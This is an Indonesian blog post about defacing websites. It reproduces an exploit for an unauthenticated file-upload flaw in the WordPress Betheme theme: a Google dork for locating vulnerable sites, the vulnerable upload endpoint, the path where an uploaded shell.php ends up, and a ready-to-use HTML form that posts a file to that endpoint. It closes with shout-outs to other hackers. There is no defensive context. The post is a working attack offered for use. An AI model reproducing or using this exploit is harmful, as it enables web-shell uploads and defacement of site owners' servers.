Deface dengan Wordpress Themes betheme Sh3ll Upload
![Deface dengan Wordpress Themes betheme Sh3ll Upload Deface dengan Wordpress Themes betheme Sh3ll Upload](https://1.bp.blogspot.com/-8Kl3yAYwxiQ/WG6TGM9o0FI/AAAAAAAAAEE/EQYhhKuqo00zFVpfSvfyL-8iUoQiPpO5wCPcB/w720-h405-p-k-no-nu/wordpress-hacked.jpg)
Daftar Isi Artikel
#################################################################################
# Wordpress Themes betheme Sh3ll Upload Vulnerability | CSRF
# Author : Turk@Xtra
# Google Dork: inurl:/wp-content/themes/betheme/
# Date:2017-03-13
# Tested on: Win 7, Linux
#################################################################################
# [!] Exploit : http://127.0.0.1/wp-content/themes/betheme/muffin-options/fields/upload/field_upload.php
# [!] File Location : http://127.0.0.1//wp-content/themes/betheme/muffin-options/fields/upload/Files/shell.php
#################################################################################
#[*] CSRF:
#################################################################################
<html>
<body>
<form enctype="multipart/form-data" action="127.0.0.1/wp-content/themes/betheme/muffin-options/fields/upload/field_upload.php" method="post">
Your File: <input name="files[]" type="file" /><br />
<input type="submit" value="SIKAT!" />
</form>
</body>
</html>
#################################################################################
# Thanks to : ~~> Blackwolf ||Ormazd ||Khatar ||mohammad Pn ||Criminal ||Rabinson.